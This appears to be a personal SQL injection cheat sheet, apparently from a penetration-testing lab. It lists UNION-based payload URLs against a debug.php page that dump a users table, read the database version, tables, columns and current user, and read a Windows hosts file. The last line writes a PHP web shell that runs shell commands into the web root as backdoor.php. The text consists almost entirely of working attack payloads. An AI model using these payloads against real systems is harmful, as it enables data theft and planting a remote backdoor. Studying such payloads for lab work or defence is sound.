http://192.168.140.52/debug.php?id=1 UNION select * from users
list version:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, @@version
list tables:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables
list users:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, user()
http://10.11.0.22/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
code exec:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
http://10.11.0.22/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'